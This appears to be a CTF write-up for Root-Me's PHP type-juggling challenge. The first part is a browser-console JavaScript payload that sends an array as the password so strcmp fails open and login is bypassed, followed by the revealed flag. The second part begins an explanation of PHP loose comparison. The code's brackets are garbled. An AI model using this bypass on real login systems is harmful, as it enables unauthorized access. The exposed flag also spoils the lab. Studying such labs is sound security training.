Permalink
Cannot retrieve contributors at this time
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
'//www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling' | |
[Soal] | |
Get an access. | |
'//challenge01.root-me.org/web-serveur/ch44/' | |
[POC] | |
Klik kanan inspect element, copy data dibawah terus paste di Console then hit enter | |
var data = {'login':true, 'password':[]} | |
$.ajax[{ | |
type: "POST", | |
dataType: "json", | |
url: "auth.php", | |
data: {auth : JSON.stringify[{data}]}, | |
success: function[data] { | |
$[".return-value"].html[ | |
"Result: " + data['status'] | |
]; | |
} | |
}]; | |
click Network lihat auth.php dikiri bawah then clik Preview | |
Warning: strcmp[] expects parameter 1 to be string, array given in /challenge/web-serveur/ch44/auth.php on line 18 {"status":"Access granted! The validation password is: DontForgetPHPL00seComp4r!s0n!!"} | |
# FLAG = DontForgetPHPL00seComp4r!s0n!! | |
Well done, you won 30 Points |
Root-me.org
PHP Type juggling
PHP loose comparison
On this challenge we need to find a way to login. The title gives us a easy tip on how we need to abuse this.
We even get access to the source code.
If we take a look at the resource that root-me gave us, we get a pretty good idea how we are going to do this. I’ll put two links worth reading concerning this exploit.
//www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pd://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
//turbochaos.blogspot.ca/2013/08/exploiting-exotic-bugs-php-type-juggling.html
There’s also this link that is a grid on how each type react with each other.
//docs.google.com/spreadsheets/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZldUw/pub?output=html
//php.net/manual/en/types.comparisons.php
So to make this short the operator “==” has a very loose way of comparing stuff.
If we take a look at the source code we’ll notice the following.